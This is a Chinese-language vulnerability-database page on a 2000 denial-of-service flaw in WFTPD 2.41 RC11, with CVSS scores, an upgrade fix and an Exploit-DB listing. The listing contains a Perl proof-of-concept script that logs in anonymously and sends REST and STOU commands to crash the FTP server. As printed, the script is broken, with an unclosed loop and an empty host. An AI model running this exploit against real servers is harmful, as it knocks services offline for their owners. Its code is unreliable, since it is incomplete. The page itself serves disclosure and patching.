发布时间 :2000-07-21 00:00:00
修订时间 :2008-09-10 15:05:31

[原文]WFTPD and WFTPD Pro 2.41 allows remote attackers to cause a denial of service by using the RESTART (REST) command and writing beyond the end of a file, or writing to a file that does not exist, via commands such as STORE UNIQUE (STOU), STORE (STOR), or APPEND (APPE).

[CNNVD]WFTPD 2.4.1RC11多个漏洞(CNNVD-200007-060)

        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过使用RESTART (REST)命令且书写超出了文件的末尾,或者写入不存在的文件,借助如STORE UNIQUE (STOU), STORE (STOR),或者APPEND (APPE)命令导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000721 WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.

- 漏洞信息

WFTPD 2.4.1RC11多个漏洞
中危 输入验证
2000-07-21 00:00:00 2005-10-20 00:00:00
        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过使用RESTART (REST)命令且书写超出了文件的末尾,或者写入不存在的文件,借助如STORE UNIQUE (STOU), STORE (STOR),或者APPEND (APPE)命令导致服务拒绝。

- 公告与补丁

        Update to WFTPD 2.4.1RC12

- 漏洞信息 (20101)

WFTPD 2.4.1RC11 REST Command Malformed File Write DoS (EDBID:20101)
windows dos
2000-07-21 Verified
0 Blue Panda
N/A [点击下载]
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda -
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------

use IO::Socket;

$host = "" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

print $socket "USER $user\nPASS $pass\nREST 1\nSTOU\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        print ".";
        $time += 1;

# Finished.
print "\nConnection closed. Finished.\n"

- 漏洞信息

Windows NT FTP Server (WFTP) REST Command Malformed File Write Handling Remote DoS
Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2000-07-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.1RC12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete